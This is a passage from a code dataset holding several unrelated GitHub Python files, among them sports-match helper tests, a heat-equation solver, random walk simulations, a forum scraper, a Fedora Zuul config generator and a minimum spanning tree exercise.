range(len(sorted_matches) - 1)\n )\n\n\ndef test_recent_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n for m in quals:\n if m.match_number > 70:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n recent_matches = MatchHelper.recent_matches(quals, num=3)\n assert [m.key_name for m in recent_matches] == [\n \"2019nyny_qm68\",\n \"2019nyny_qm69\",\n \"2019nyny_qm70\",\n ]\n\n\ndef test_recent_matches_none_played(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n for m in quals:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n recent_matches = MatchHelper.recent_matches(quals, num=3)\n assert recent_matches == []\n\n\ndef test_upcoming_matches(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n for m in quals:\n if m.match_number > 70:\n m.alliances[AllianceColor.RED][\"score\"] = -1\n m.alliances[AllianceColor.BLUE][\"score\"] = -1\n m.alliances_json = json.dumps(m.alliances)\n m._alliances = None\n\n upcoming_matches = MatchHelper.upcoming_matches(quals, num=3)\n assert [m.key_name for m in upcoming_matches] == [\n \"2019nyny_qm71\",\n \"2019nyny_qm72\",\n \"2019nyny_qm73\",\n ]\n\n\ndef test_upcoming_matches_all_played(test_data_importer) -> None:\n matches = test_data_importer.parse_match_list(\n __file__, \"data/2019nyny_matches.json\"\n )\n quals = [m for m in matches if m.comp_level == CompLevel.QM]\n\n upcoming_matches = MatchHelper.upcoming_matches(quals, num=3)\n assert upcoming_matches == []\n\n\ndef _parse_match_schedule_csv(event, filename):\n matches = []\n with open(filename) as f:\n reader = csv.DictReader((line.lower() for line in f), skipinitialspace=True)\n for row in reader:\n alliances = {}\n for alliance_color in (\"red\", \"blue\"):\n alliances[alliance_color] = {\n \"teams\": [\n \"frc\" + row[f\"{alliance_color} {i + 1}\"] for i in range(3)\n ],\n \"score\": row.get(f\"{alliance_color} score\", -1),\n }\n\n match = Match(\n event=event.key,\n id=Match.render_key_name(\n event.key_name,\n row[\"comp_level\"],\n row[\"set_number\"],\n row[\"match_number\"],\n ),\n comp_level=row[\"comp_level\"],\n set_number=int(row[\"set_number\"]),\n match_number=int(row[\"match_number\"]),\n alliances_json=json.dumps(alliances),\n time_string=row[\"time\"],\n )\n\n matches.append(match)\n\n return matches\n\n\ndef test_add_match_times(test_data_importer):\n event = Event(\n id=\"2014casj\",\n event_short=\"casj\",\n event_type_enum=EventType.REGIONAL,\n name=\"Silicon Valley Regional\",\n start_date=datetime.datetime(2014, 2, 27, 0, 0),\n end_date=datetime.datetime(2014, 3, 1, 0, 0),\n year=2014,\n timezone_id=\"America/New_York\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(\n __file__, \"data/usfirst_event_matches_2013cama.csv\"\n ),\n )\n assert len(matches) == 92\n\n MatchHelper.add_match_times(event, matches)\n\n PST_DELTA = datetime.timedelta(hours=-5)\n assert matches[0].time == datetime.datetime(2014, 2, 28, 9, 0) - PST_DELTA\n assert matches[75].time == datetime.datetime(2014, 3, 1, 11, 50) - PST_DELTA\n\n\ndef test_add_match_times_dst(test_data_importer):\n event = Event(\n id=\"2014casj\",\n event_short=\"casj\",\n event_type_enum=EventType.REGIONAL,\n name=\"Silicon Valley Regional\",\n start_date=datetime.datetime(2014, 3, 8, 0, 0),\n end_date=datetime.datetime(2014, 3, 9, 0, 0), # chosen to span DST change\n year=2014,\n timezone_id=\"America/Los_Angeles\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(__file__, \"data/usfirst_event_matches_2012ct.csv\"),\n )\n assert len(matches) == 125\n\n MatchHelper.add_match_times(event, matches)\n\n PST_DELTA = datetime.timedelta(hours=-8)\n PDT_DELTA = datetime.timedelta(hours=-7)\n assert matches[0].time == datetime.datetime(2014, 3, 8, 9, 0) - PST_DELTA\n assert matches[-1].time == datetime.datetime(2014, 3, 9, 16, 5) - PDT_DELTA\n\n\ndef test_add_match_times_with_weekdays(test_data_importer):\n event = Event(\n id=\"2023mibb\",\n event_short=\"mibb\",\n event_type_enum=EventType.OFFSEASON,\n name=\"Big Bang!\",\n start_date=datetime.datetime(2023, 6, 29, 0, 0),\n end_date=datetime.datetime(2023, 7, 1, 0, 0),\n year=2023,\n timezone_id=\"America/Detroit\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(__file__, \"data/2023mibb_matches_quals.csv\"),\n )\n assert len(matches) == 60\n\n MatchHelper.add_match_times(event, matches)\n\n EDT_DELTA = datetime.timedelta(hours=-4)\n assert matches[0].time == datetime.datetime(2023, 6, 30, 9, 30) - EDT_DELTA\n assert matches[49].time == datetime.datetime(2023, 6, 30, 17, 51) - EDT_DELTA\n assert matches[50].time == datetime.datetime(2023, 7, 1, 9, 30) - EDT_DELTA\n assert matches[59].time == datetime.datetime(2023, 7, 1, 10, 51) - EDT_DELTA\n\n\ndef test_add_match_times_with_weekdays_early_end(test_data_importer):\n event = Event(\n id=\"2023mirr\",\n event_short=\"mirr\",\n event_type_enum=EventType.OFFSEASON,\n name=\"Rainbow Rumble\",\n start_date=datetime.datetime(2023, 7, 21, 0, 0),\n end_date=datetime.datetime(2023, 7, 23, 0, 0),\n year=2023,\n timezone_id=\"America/Detroit\",\n )\n\n matches = _parse_match_schedule_csv(\n event,\n test_data_importer._get_path(__file__, \"data/2023mirr_matches_quals.csv\"),\n )\n assert len(matches) == 48\n\n MatchHelper.add_match_times(event, matches)\n\n EDT_DELTA = datetime.timedelta(hours=-4)\n assert matches[0].time == datetime.datetime(2023, 7, 22, 10, 30) - EDT_DELTA\n assert matches[47].time == datetime.datetime(2023, 7, 22, 18, 0) - EDT_DELTA\n\n\ndef test_cleanup_matches(ndb_stub, test_data_importer):\n event = Event(\n id=\"2013test\",\n event_short=\"test\",\n year=2013,\n event_type_enum=EventType.REGIONAL,\n )\n event.put()\n\n played = [\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 0}},\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 20}},\n {\"red\": {\"score\": 5}, \"blue\": {\"score\": 0}},\n ]\n unplayed = {\"red\": {\"score\": -1}, \"blue\": {\"score\": -1}}\n\n matches = [\n Match(\n id=f\"2013test_qf1m{i}\",\n comp_level=CompLevel.QF,\n set_number=1,\n match_number=i,\n event=ndb.Key(Event, \"2013test\"),\n alliances_json=json.dumps(played[i - 1] if i < 4 else unplayed),\n )\n for i in range(1, 6)\n ]\n\n cleaned_matches, keys_to_delete = MatchHelper.delete_invalid_matches(matches, event)\n assert [m.key_name for m in cleaned_matches] == [\n \"2013test_qf1m1\",\n \"2013test_qf1m2\",\n \"2013test_qf1m3\",\n ]\n assert [k.id() for k in keys_to_delete] == [\"2013test_qf1m4\", \"2013test_qf1m5\"]\n","repo_name":"Zach3292/the-blue-alliance","sub_path":"src/backend/common/helpers/tests/match_helper_test.py","file_name":"match_helper_test.py","file_ext":"py","file_size_in_byte":15016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"12442922303","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 14:24:10 2018\n\n@author: Administrator\n\"\"\"\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nprint('-------------------\\n');\n'''1)获得数据集的个数'''\ntrain_nums = mnist.train.num_examples\nvalidation_nums = mnist.validation.num_examples\ntest_nums = mnist.test.num_examples\nprint('MNIST数据集的个数')\nprint(' >>>train_nums=%d' % train_nums,'\\n',\n '>>>validation_nums=%d'% validation_nums,'\\n',\n '>>>test_nums=%d' % test_nums,'\\n')","repo_name":"RonnySun/TensorFlow-Rasberry-pai","sub_path":"python-example/first-pro/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20864088355","text":"from matplotlib import pyplot as plt\nfrom numpy import sin, exp, pi\n\n\ndef solve_parabolic(start, border_left, border_right, source, ts, te):\n \"\"\"\n start -- начальное условие\n border_*(t) -- граничные\n source(x, t) -- функция источника\n ts -- время начала эксперимента\n te -- время конца эксперимента\n \"\"\"\n u = list(start)\n\n # количество шагов на оси x\n n = len(u) - 1\n xi = 1.0 / n\n\n # шаг по времени (из условия Куранта)\n r = 0.45 # < 0.5\n tau = r * xi ** 2\n\n # копия, пригдится при расчёте\n v = list(u)\n\n # текущее время\n t = ts\n\n while t < te:\n # пересчёт значений в середине по разносной схеме\n for i in range(1, n):\n v[i] = (1 - 2 * r) * u[i] +\\\n r * (u[i-1] + u[i+1]) +\\\n tau * source(i * xi, t)\n # пересчёт значений на краях\n a0, b0, c0 = border_left(t)\n a1, b1, c1 = border_right(t)\n v[0] = (c0 - v[1] * a0 / xi) / (b0 - a0 / xi)\n v[n] = (c1 + v[n-1] * a1 / xi) / (b1 + a1 / xi)\n # нет времени объяснять\n u, v = v, u\n # обновление времени\n t += tau\n\n return u\n\n# Рассмотрим решение на примере задачи о распределении температур в стержне\n# Пусть у достаточно тонкого стержня отсутствуют тепловые потери через боковую\n# поверхность. При этом левый его конец приведён в тепловой контакт с\n# термостатом, а правый -- теплоизолирован. Внутри стержня посередине находится\n# достаточно маленький источник тепла. Требуется определить распределение\n# температур в стержне\n\nn = 100\n\n# задаём начальное условие\nu = [0.0 for i in range(n + 1)]\n\n# граничные\nlocked = lambda t: [0.0, 1.0, 0.0] # контакт с термостатом\nfree = lambda t: [1.0, 0.0, 0.0] # теплоизолированный конец\nsource = lambda x, t: 1 if abs(x-0.5) < 1.0 / n else 0 # \"точечный\" источник посередине\n\nX = [1.0 / n * i for i in range(n+1)]\n\n# профиль функции\nplt.plot(X, u)\n\ndt = 0.1\nfor i in range(7):\n u = solve_parabolic(u, locked, free, source, i * dt, (i + 1) * dt)\n plt.plot(X, u)\n\n# покажи мне это\nplt.xlabel('distance')\nplt.ylabel('temperature')\nplt.title('The temperature distribution in the rod')\nplt.show()\n","repo_name":"Antoniii/lab4","sub_path":"parabolicus.py","file_name":"parabolicus.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9839319817","text":"import time\n\nfrom forums.models import ForumGroup, Forum, Topic, User, Post\n\nfrom .home_page import HomePage\nfrom .recent_discussions import RecentDiscussionsPage\nfrom .discussion import DiscussionPage\n\n\ndef has_seen_post(site, topic, user_id, post_datetime):\n # return whether we've already seen a post from the given user\n # at the given time in the given topic\n try:\n user = site.users.get(source_reference=user_id)\n except User.DoesNotExist:\n # user is unknown, so we can't have seen this post before\n return False\n\n return bool(topic.posts.filter(\n author=user, created_at=post_datetime\n ))\n\n\ndef scrape(site, min_date=None, get_updates=False, verbose=True):\n home_page = HomePage(site.origin_url)\n forums_by_identifier = {}\n\n for category_group in home_page.category_groups:\n # find / create ForumGroup\n forum_group, created = ForumGroup.objects.get_or_create(\n site=site, source_reference=category_group.identifier,\n defaults={'name': category_group.name}\n )\n if not created:\n changed_fields = []\n if forum_group.name != category_group.name:\n changed_fields.append('name')\n forum_group.name = category_group.name\n\n if changed_fields:\n forum_group.save(update_fields=changed_fields)\n\n for category in category_group.categories:\n # find / create Forum\n forum, created = Forum.objects.get_or_create(\n site=site, source_reference=category.identifier,\n defaults={\n 'forum_group': forum_group,\n 'name': category.name,\n 'description': category.description\n }\n )\n if not created:\n changed_fields = []\n if forum.forum_group != forum_group:\n changed_fields.append('forum_group')\n forum.forum_group = forum_group\n if forum.name != category.name:\n changed_fields.append('name')\n forum.name = category.name\n if forum.description != category.description:\n changed_fields.append('description')\n forum.description = category.description\n\n if changed_fields:\n forum.save(update_fields=changed_fields)\n\n forums_by_identifier[category.identifier] = forum\n\n discussions_to_fetch = []\n\n page_num = 1\n has_reached_min_date = False\n\n while not has_reached_min_date:\n if verbose:\n print(\"Scanning recent discussions, page %d\" % page_num)\n\n recent_discussions = RecentDiscussionsPage(\n site.origin_url, page_number=page_num\n )\n\n for discussion in recent_discussions.discussions:\n\n last_poster = discussion.last_poster\n if (min_date is not None and last_poster.datetime < min_date):\n # discussion is older than min_date\n if discussion.is_sticky:\n # move to next discussion\n continue\n else:\n # all subsequent discussions are older than min_date\n has_reached_min_date = True\n break\n\n # find / create Topic\n topic, created = Topic.objects.get_or_create(\n forum=forums_by_identifier[discussion.category_identifier],\n source_reference=discussion.id,\n defaults={'title': discussion.title}\n )\n\n if (\n get_updates and not created\n and has_seen_post(site, topic, last_poster.user_id, last_poster.datetime)\n ):\n if discussion.is_sticky:\n continue\n else:\n has_reached_min_date = True\n break\n\n # last post of discussion is within range and not already seen -\n # fetch the discussion\n discussions_to_fetch.append(\n (topic, discussion.slug, discussion.page_count)\n )\n\n if page_num >= recent_discussions.max_page_number:\n # we have reached the end of the listing\n has_reached_min_date = True\n\n time.sleep(5)\n page_num += 1\n\n # fetch discussions in reverse order, so that if an error occurs we will\n # have scanned all the discussions older than that one, and can resume by\n # re-running the task\n for topic, slug, page_count in reversed(discussions_to_fetch):\n has_reached_min_date = False\n\n posts_to_add = []\n\n for page_num in range(page_count, 0, -1):\n if verbose:\n print(\n \"Fetching topic: %s, page %d of %d\" % (\n topic.title, page_num, page_count\n )\n )\n\n discussion_page = DiscussionPage(\n site.origin_url, topic.source_reference, slug, page_number=page_num\n )\n\n for post in reversed(discussion_page.posts):\n if min_date is not None and post.datetime < min_date:\n has_reached_min_date = True\n break\n elif get_updates and has_seen_post(site, topic, post.author_id, post.datetime):\n has_reached_min_date = True\n break\n else:\n posts_to_add.append(post)\n\n time.sleep(5)\n\n if has_reached_min_date:\n break\n\n for source_post in reversed(posts_to_add):\n # find / create User\n user, created = User.objects.get_or_create(\n site=site, source_reference=source_post.author_id,\n defaults={'username': source_post.author_username}\n )\n if not created and source_post.author_username != user.username:\n user.username = source_post.author_username\n user.save(update_fields=['username'])\n\n # find / create Post\n post, created = Post.objects.get_or_create(\n topic=topic, source_reference=source_post.id,\n defaults={\n 'author': user, 'created_at': source_post.datetime,\n 'body': source_post.body\n }\n )\n","repo_name":"gasman/euphorium","sub_path":"vanilla_scraper/scraper/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12577637684","text":"# 블랙잭\n\n# 3장을 고른다 -\n\nn = 5\nm = 21\ncards = [5, 6, 7, 8, 9]\n\nn, m = map(int, input().split())\ncards = list(map(int, input().split()))\nresult = 0\n\nfor i in range(n):\n for j in range(i+1, n):\n for k in range(j+1, n):\n if cards[i] + cards[j] + cards[k] > m:\n continue\n else:\n result = max(result, cards[i] + cards[j] + cards[k])\n\n\n\nprint(result)\n\n\n# 다른 풀이\n\nfrom itertools import combinations\n\ncard_num, target_num = map(int, input().split())\ncard_list = list(map(int, input().split()))\nbiggest_sum = 0\n\nfor cards in combinations(card_list, 3):\n temp_sum = sum(cards)\n if biggest_sum < temp_sum <= target_num:\n biggest_sum = temp_sum\n\nprint(biggest_sum)\n\n\n","repo_name":"haremeat/Algorithm","sub_path":"boj/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38259218330","text":"import cv2\nimport os\n\nif __name__ == '__main__':\n\n basePath = \"/Users/lxy/Desktop/FYP/videos/frameExtraction/\"\n directory = os.fsencode(basePath)\n\n for file in os.listdir(directory):\n fileName = os.fsdecode(file)\n fileName = fileName.replace(\"\\n\", \"\")\n # print(basePath + fileName)\n # print(pathway)\n cap = cv2.VideoCapture(basePath + fileName)\n c = 1\n frameRate = 100 # Interval between frames\n \n while (True):\n ret, frame = cap.read()\n if ret:\n if c % frameRate == 0:\n print(\"Start video capturing \" + str(c) + \" frame\")\n cv2.imwrite(\"/Users/lxy/Desktop/FYP/videos/frameExtraction/\" + fileName + str(c) + \".jpg\", frame)\n c += 1\n\n else:\n print(\"All frames saved\")\n break\n cap.release()\n","repo_name":"XunyiLu/FYP_understand_video_advertisement","sub_path":"frame_Extraction.py","file_name":"frame_Extraction.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16405429495","text":"from django import forms\nfrom .models import AAPerson\n\nclass PersonSearchForm(forms.Form):\n q = forms.CharField(max_length=100, required=False)\n page = forms.IntegerField(required=False)\n\n # get evidence type list directly from the database\n freedStatus = forms.MultipleChoiceField(\n choices = AAPerson.FREED_STATUS,\n widget = forms.CheckboxSelectMultiple,\n required=False,\n )\n\n # order by\n # sortOrder = forms.CharField(max_length=24, required=False)\n SORT_CHOICES = (('name','name'), \n ('last_name','last name'), \n ('birth_year','birth'), \n ('death_year','death'),\n ('first_appearance_year','first rec'),\n ('last_appearance_year','last rec'),\n )\n sortOrder = forms.ChoiceField(\n choices = SORT_CHOICES,\n widget = forms.Select,\n required=False,\n )\n","repo_name":"DigitalGizmo/aane_project","sub_path":"aane/people/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8041312966","text":"import argparse\nimport asyncio\n\nimport aiohttp\nimport yaml\n\n\nclass CustomDumper(yaml.Dumper):\n \"\"\"Dump the yaml in format that follows the current fedora-distgits.yaml\n\n Default yaml.dump() generates this:\n\n source-repositories:\n - rpms/3dprinter-udev-rules:\n default-branch: main\n zuul/include: []\n\n We want this:\n\n source-repositories:\n - rpms/3dprinter-udev-rules:\n default-branch: main\n zuul/include: []\n \"\"\"\n def increase_indent(self, flow=False, indentless=False):\n return super().increase_indent(flow, False)\n\n\nasync def find_packages_by_maintainers(queried_maintainers):\n async with aiohttp.ClientSession() as session:\n async with session.get(\n 'https://src.fedoraproject.org/extras/pagure_bz.json'\n ) as response:\n all_maintainers = await response.json()\n\n return {\n pkgname\n for pkgname, maintainers in all_maintainers[\"rpms\"].items()\n for maintainer in maintainers\n if maintainer in queried_maintainers\n }\n\n\nasync def return_if_retired(pkg, semaphore, sleep=1):\n url = f'https://src.fedoraproject.org/rpms/{pkg}/blob/rawhide/f/dead.package'\n async with semaphore, aiohttp.ClientSession() as session:\n try:\n async with session.head(url) as resp:\n if resp.status == 404:\n return\n elif resp.status == 200:\n return pkg\n elif resp.status >= 400:\n raise aiohttp.client_exceptions.ServerConnectionError()\n except (aiohttp.client_exceptions.ClientError, asyncio.TimeoutError):\n if sleep > 15 * 60:\n raise\n await asyncio.sleep(sleep)\n return await return_if_retired(pkg, semaphore, sleep*2)\n\n\nasync def get_active_packages(maintainers):\n packages_by_maintainers = await find_packages_by_maintainers(maintainers)\n \n # Check which of the above set are retired\n tasks = []\n semaphore = asyncio.Semaphore(512)\n for pkg in packages_by_maintainers:\n tasks.append(asyncio.create_task(return_if_retired(pkg, semaphore)))\n done = await asyncio.gather(*tasks)\n retired_pkgs = {pkg for pkg in done if pkg}\n \n # Filter only the non-retired package from our list\n return packages_by_maintainers - retired_pkgs\n\n\nasync def get_zuul_config():\n async with aiohttp.ClientSession() as session:\n async with session.get('https://pagure.io/fedora-project-config/raw/master/f/resources/fedora-distgits.yaml') as response:\n config = await response.text()\n return yaml.safe_load(config)\n\n\ndef list_packages_in_zuul(zuul_config):\n all_entries = zuul_config['resources']['projects']['Fedora-Distgits']['source-repositories']\n\n zuul_pkgnames = set()\n for entry in all_entries:\n for key in entry:\n # hack for `rpms/systemd` is not a dictionary, so it gets parsed by letters\n if len(key) == 1:\n key = entry\n # key is in format `rpms/pkg` or `tests/pkg`\n # we don't strip the prefixes because we'd lost the information down the line\n zuul_pkgnames.add(key)\n return zuul_pkgnames\n\n\ndef create_common_package_set(packages_by_maintainers, all_zuul_pkgs):\n # assume the newly added packages are `rpms/`\n packages_by_maintainers = {'rpms/' + pkg for pkg in packages_by_maintainers}\n common_package_set = packages_by_maintainers | all_zuul_pkgs\n if common_package_set == all_zuul_pkgs:\n # no new packages to add\n return False\n return common_package_set\n\n\ndef create_new_zuul_config(zuul_config, common_package_set):\n new_zuul_pkgs = []\n common_package_list = sorted(common_package_set)\n for pkg in common_package_list:\n # hack: systemd is not a dictionary, hence different handling\n if pkg == 'rpms/systemd':\n new_zuul_pkgs.append(pkg)\n else:\n new_zuul_pkgs.append({pkg: {'zuul/include': [], 'default-branch': 'main'}})\n\n zuul_config['resources']['projects']['Fedora-Distgits']['source-repositories'] = new_zuul_pkgs\n\n with open('fedora-distgits.yaml', 'w') as new_config_file:\n new_config_file.write(\n yaml.dump(\n zuul_config, Dumper=CustomDumper, default_flow_style=False, indent=2\n )\n )\n\nasync def generate_zuul_config(packages_by_owners):\n zuul_config = await get_zuul_config()\n all_pkgs_in_zuul = list_packages_in_zuul(zuul_config)\n common_pkg_set = create_common_package_set(packages_by_owners, all_pkgs_in_zuul)\n if common_pkg_set:\n create_new_zuul_config(zuul_config, common_pkg_set)\n else:\n print(\"No new packages to add - no config generated\")\n\n\nasync def main(maintainers):\n active_packages_by_owners = await get_active_packages(maintainers)\n await generate_zuul_config(active_packages_by_owners)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Provide a comma-separated list of FAS maintainers/groups to bulk add to zuul.'\n )\n parser.add_argument('maintainers', type=str, nargs='+',\n help='a comma-separated list of FAS maintainers')\n\n args = parser.parse_args()\n maintainers = [maintainer.strip() for maintainer in args.maintainers[0].split(',')]\n\n asyncio.run(main(maintainers))\n","repo_name":"befeleme/zuul-config-generator","sub_path":"generate_new_zuul_config.py","file_name":"generate_new_zuul_config.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13623092735","text":"# __Background:__ explore some path properties of the simple symmetric random walk.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import arcsine\n\n# ## Problem 1\ndef randomWalk(lengthOfRandomWalk):\n samplePath=np.zeros(lengthOfRandomWalk+1)\n randomWalk=np.random.choice([-1,1], lengthOfRandomWalk)\n \n for i in range(lengthOfRandomWalk):\n samplePath[i+1]=samplePath[i]+randomWalk[i]\n return samplePath\n\n## TEST YOUR FUNCTION HERE\nprint(randomWalk(50))\n# 2. Plot the trajectory of the random walk you simulated in 1.)\nplt.figure(figsize=(10,5))\nplt.plot(randomWalk(50))\nplt.xlabel(\"rounds\")\nplt.ylabel(\"capital\")\nplt.title(\"trajectory of the random walk\")\nplt.show()\n\n#Problem 2\ndef TimeOfLastVisitOfZero(path):\n result=np.where(path==0)\n lastVisit=np.max(result)\n \n return lastVisit \n\n## TEST YOUR FUNCTION HERE\npath = randomWalk(20)\nprint(path)\nTimeOfLastVisitOfZero(path)\n\n## A PLOT OF THE ARCSINE DENSITY\nx = np.linspace(arcsine.ppf(0.05), arcsine.ppf(0.95), 100)\nplt.title(\"Density of the arcsine distribution\")\nplt.plot(x, arcsine.pdf(x), linewidth=2, color='b')\nplt.show()\n\n# COMPLETE/MODIFY THE PLOT COMMANDS ACCORDINGLY\nN = 250\nM = 10000\n\ndef sampleLastVisit(N,M):\n LastVisit=np.zeros(M)\n for i in range(M):\n LastVisit[i]=TimeOfLastVisitOfZero(randomWalk(2*N))\n return LastVisit\n \nc= sampleLastVisit(N,M)\n# This has to be replaced by the simulated values for L_2N !!!\n\nplt.figure(figsize=(10,5))\nplt.title(\"Normalized histogram for 10000 realisations of $L_{500}$\")\nplt.hist(c, bins='auto', density='True')\nplt.show()\n\n# Problem3\ndef timeHitMax(randomWalk):\n \n result=np.argmax(randomWalk)\n\n return result \n\n## TEST YOUR FUNCTION HERE\npath = randomWalk(20)\nprint(path)\ntimeHitMax(path)\n\n# COMPLETE/MODIFY THE PLOT COMMANDS ACCORDINGLY\nN = 250\nM = 10000\n\ndef sampleMaxTime(N,M):\n maxTime=np.zeros(M)\n for i in range(M):\n maxTime[i]=timeHitMax(randomWalk(2*N))\n return maxTime\n \nc= sampleMaxTime(N,M)\n# This has to be replaced by the simulated values for M_2N !!!\n\nplt.figure(figsize=(10,5))\nplt.title(\"Normalized histogram for 10000 realisations of $M_{500}$\")\nplt.hist(c, bins='auto', density='True')\nplt.show()\n","repo_name":"wab1babu/Portfolio","sub_path":"Python/Stochastic Process/Project3.py","file_name":"Project3.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7080967008","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\n\r\ndef pytest_addoption(parser):\r\n parser.addoption('--language', action='store', default=\"en\",\r\n help=\"Choose site language\")\r\n\r\n\r\n@pytest.fixture(scope=\"function\")\r\ndef browser(request):\r\n user_language = request.config.getoption(\"language\")\r\n print(\"\\nstart browser for test..\")\r\n\r\n options = Options()\r\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\r\n\r\n # Общий вариант запуска\r\n browser = webdriver.Chrome(options=options)\r\n\r\n # Запуск для моего компа\r\n # chrome_service_executable_path = \"C:\\\\Users\\\\thatsme\\\\AppData\\\\Local\\\\Programs\\\\ChromeDriver\\\\chromedriver.exe\"\r\n # chrome_service = Service(executable_path=chrome_service_executable_path)\r\n # browser = webdriver.Chrome(options=options, service=chrome_service)\r\n\r\n yield browser\r\n print(\"\\nquit browser..\")\r\n browser.quit()\r\n","repo_name":"xsmit/Stepik_Selenium_final_exercise","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18491357714","text":"from queue import SimpleQueue as Q\nfrom typing import List, Tuple\nimport heapq\nfrom algo_utils import PriorityQueue\n\n# this implementation works but the real algorithm uses a priority queue\n# why is a priority queue better in this algorithm?\n\n\ndef min_spanning_tree(\n graph: List[List[(Tuple[int, int])]], n:int\n) -> List[List[Tuple[int, int]]]:\n node = 0\n visited = set()\n q = PriorityQueue()\n raw_tree = []\n cost = 0\n seen_with = [float(\"inf\") for _ in range(n)]\n while len(raw_tree) < n:\n edges = get_edges(node, graph)\n for edge in edges:\n if edge[1] not in visited:\n q.insert(edge[-1], edge[:2])\n visited.add(node)\n if q.empty():\n break\n w, (par, node) = q.pull()\n while node in visited and not q.empty():\n w, (par, node) = q.pull()\n if seen_with[node] > w:\n raw_tree.append((par, node, w))\n seen_with[node] = w\n cost = sum(a[-1] for a in raw_tree)\n tree_center, tree = find_tree_center(raw_tree, n)\n tree = root_tree(tree, tree_center)\n return tree, cost\n\ndef get_edges(node, edges):\n start = 0\n end = len(edges)\n res = []\n while start < end:\n mid = (start + end)//2\n val = edges[mid][0]\n if val < node:\n start = mid + 1\n elif val > node:\n end = mid - 1\n else:\n res.append(edges[mid])\n a = mid - 1\n b = mid + 1\n while (a > -1 or b < len(edges)) :\n if a > -1 and edges[a][0] == node:\n res.append(edges[a])\n if b < len(edges) and edges[b][0] ==node:\n res.append(edges[b])\n a -= 1\n b += 1\n \n return res\n\n\ndef root_tree(\n tree: List[List[Tuple[int, int]]], node: int\n) -> List[List[Tuple[int, int]]]:\n visited = [False for _ in tree]\n res = [[] for _ in tree]\n q = Q()\n q.put(node)\n visited[node] = True\n while not q.empty():\n node = q.get()\n children = tree[node]\n for child, weight in children:\n if not visited[child]:\n visited[child] = True\n q.put(child)\n res[node].append((child, weight))\n\n return res\n\n\n\ndef edges_to_adj_list(edges, n):\n out = [[] for _ in range(n)]\n for f,t,w in edges:\n out[f].append((t,w))\n out[t].append((f,w))\n return out\n\n\n\ndef find_tree_center(tree, n) -> int:\n tree = edges_to_adj_list(tree, n)\n degs = [0 for _ in tree]\n leaves = []\n for node, children in enumerate(tree):\n degs[node] = len(children)\n if degs[node] <= 1:\n leaves.append(node)\n processed = len(leaves)\n while processed < len(tree):\n new_leaves = []\n for node in leaves:\n degs[node] = 0\n for k, weight in tree[node]:\n degs[k] -= 1\n if degs[k] <= 1:\n new_leaves.append(k)\n leaves = new_leaves\n processed += len(leaves)\n return leaves[0], tree\n\n\nif __name__ == \"__main__\":\n\n edges = [\n (0, 1, 10),\n (0, 2, 1),\n (0, 3, 4),\n (1, 0, 10),\n (1, 2, 3),\n (1, 4, 0),\n (2, 0, 1),\n (2, 1, 3),\n (2, 3, 2),\n (2, 5, 8),\n (3, 0, 4),\n (3, 2, 2),\n (3, 5, 2),\n (3, 6, 7),\n (4, 1, 0),\n (4, 5, 1),\n (4, 7, 8),\n (5, 4, 1),\n (5, 2, 8),\n (5, 7, 9),\n (5, 6, 6),\n (5, 3, 2),\n (6, 3, 7),\n (6, 5, 6),\n (6, 7, 12),\n (7, 4, 8),\n (7, 5, 9),\n (7, 6, 12),\n ]\n print(min_spanning_tree(edges, 